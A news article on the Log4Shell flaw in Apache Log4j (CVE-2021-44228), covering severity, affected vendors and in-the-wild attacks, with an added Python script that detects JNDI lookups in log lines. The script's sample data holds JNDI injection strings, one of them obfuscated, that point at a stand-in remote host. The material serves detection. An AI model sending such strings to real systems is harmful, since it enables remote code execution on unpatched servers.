The Apache Software Foundation has released patches to address an actively exploited zero-day vulnerability in the widely used Apache Log4j Java-based logging library which could be used to execute malicious code and take complete control of vulnerable systems.
The issue, tracked as CVE-2021-44228 and known as Log4Shell or LogJam, involves unauthenticated remote code execution (RCE) in any application that uses the open-source utility, and affects Log4j 2.0-beta9 through 2.14.1. The bug received a perfect 10 out of 10 in the CVSS rating system, indicating the severity of the problem.
The Apache Foundation advised that “When message lookup substitution is enabled, an attacker with control over log messages or log message parameters can execute arbitrary code loaded from LDAP servers. This behaviour is now disabled by default in Log4j 2.15.0.”
Log4j is used as a logging package in a wide range of popular software and services, including those of Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft. In the latter case, attackers were able to gain RCE on Minecraft servers simply by pasting a specially crafted message into the chat box.
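The point of the Apache advisory and the Minecraft case above is that any untrusted input which reaches a log statement (a chat message, a User-Agent header, a form field) can carry a lookup string that the library evaluates. The detection script below is an added example and is not code from the article, from Apache, or from any vendor named in it. It scans constructed sample log lines (not real traffic) for JNDI lookups, first collapsing nested lookup syntax from the inside out so that a lookup assembled from the documented `lower`, `upper` and `${name:-default}` forms is still recognised. The resolution rules are a deliberate simplification of Log4j's own substitution and are an assumption of this example, as is every sample line.

```python
import re

# Constructed sample log lines for this example (three benign, two carrying a JNDI lookup).
# None of these are real traffic or real hostnames.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:18:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:18:01:07 +0000] "GET / HTTP/1.1" 200 128 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:18:01:09 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79.1"',
    '10.0.0.3 - - [10/Dec/2021:18:01:11 +0000] "GET / HTTP/1.1" 404 0 "-" "${${lower:j}ndi:rmi://example.invalid/b}"',
    '[INFO] user entered chat message: hello ${date:yyyy}',
]

# An innermost lookup: ${...} whose body contains no further "${" or "}".
LOOKUP_INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we ultimately want to flag once nesting has been collapsed.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(match: "re.Match[str]") -> str:
    """Resolve one innermost lookup the way a reader would, or leave it intact.

    Simplified assumption of this example: only the 'lower' and 'upper' lookups
    and the ${name:-default} default-value syntax are resolved. Any other lookup
    (jndi, date, env, ...) is kept verbatim so it can be inspected afterwards.
    """
    body = match.group(1)
    key, sep, rest = body.partition(":")
    name = key.strip().lower()
    if sep and name == "lower":
        return rest.lower()
    if sep and name == "upper":
        return rest.upper()
    if ":-" in body:  # ${name:-default} evaluates to the default text
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookup syntax from the inside out until the text is stable.

    max_rounds bounds the work on pathological input; a line that still changes
    after that many rounds is returned as-is and will be scanned in that state.
    """
    for _ in range(max_rounds):
        resolved = LOOKUP_INNERMOST.sub(_resolve, text)
        if resolved == text:
            return resolved
        text = resolved
    return text


def find_jndi_lookups(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if JNDI_PATTERN.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, normalized in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {number}: {normalized}")
```

Run over the constructed input, the scanner flags lines 2 and 4 and shows line 4 in its collapsed form, which is what an analyst needs when triaging web-server or chat logs for attempts that reached a vulnerable logger. A hit only tells you that a lookup string was logged, not that it resolved; the remediation remains the upgrade to 2.15.0 (or later) described in the advisory, where message lookups are disabled by default.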
Bharat Jogi, Qualys’ senior manager of vulnerabilities and signatures, reported that “The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we’ve seen this year. Log4j is a widely used library for logging error messages that is used by millions of Java applications. This flaw is extremely simple to exploit.”
Following the availability of a proof-of-concept (PoC) exploit, the cybersecurity firms BitDefender, Cisco Talos, Huntress Labs, and Sonatype all confirmed mass scanning in the wild for vulnerable servers and attacks recorded against their honeypot networks. “This is a low skill attack that is extremely simple to execute,” said Ilkka Turunen of Sonatype.
GreyNoise, which compares the flaw to Shellshock, reported malicious activity targeting the vulnerability beginning on December 9, 2021. Cloudflare, a web infrastructure company, noted blocking approximately 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with the majority of the exploitation attempts coming from Canada, the United States, the Netherlands, France, and the United Kingdom.
Cybereason, an Israeli cybersecurity firm, has also released a fix called “Logout4Shell” that addresses the flaw by using the vulnerability itself to reconfigure the logger and so prevent further exploitation. Finally, security expert Marcus Hutchins concluded: “This Log4j (CVE-2021-44228) flaw is extremely serious. Log4j is used by millions of applications for logging, and all the attacker needs to do is get the app to log a special string.”